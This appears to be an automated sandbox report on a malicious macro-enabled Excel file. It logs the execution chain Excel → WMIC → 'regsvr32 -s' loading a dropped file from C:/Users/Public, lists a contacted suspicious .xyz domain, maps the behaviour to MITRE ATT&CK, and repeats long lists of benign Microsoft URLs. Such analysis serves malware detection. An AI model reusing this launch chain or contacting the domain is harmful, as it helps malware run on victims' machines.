Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref'
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:/Users/Public/dbhfr.xref
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref'Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Documents (252).xlsmInitial sample: OLE zip file path = xl/media/image1.png
Source: Documents (252).xlsmInitial sample: OLE zip file path = xl/media/image2.png
Source: Documents (252).xlsmInitial sample: OLE zip file path = xl/media/image3.png
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: WMIC.exe, 00000001.00000002.219191169.00000000030A0000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.219025222.0000000002620000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WMIC.exe, 00000001.00000002.219191169.00000000030A0000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.219025222.0000000002620000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WMIC.exe, 00000001.00000002.219191169.00000000030A0000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.219025222.0000000002620000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WMIC.exe, 00000001.00000002.219191169.00000000030A0000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.219025222.0000000002620000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation21DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting21Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution31Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerSystem Information Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting21NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
xherzog24pv.xyz1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
xherzog24pv.xyz
unknown
unknowntrueunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
    high
    https://login.microsoftonline.com/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
      high
      https://shell.suite.office.com:144357FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
          high
          https://autodiscover-s.outlook.com/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
              high
              https://cdn.entity.57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                    high
                    https://powerlift.acompli.net57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v157FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                      high
                      https://cortana.ai57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                high
                                https://api.aadrm.com/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                      high
                                      https://cr.office.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/Office57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                            high
                                            https://graph.ppe.windows.net57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                            high
                                                            https://graph.windows.net57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                          high
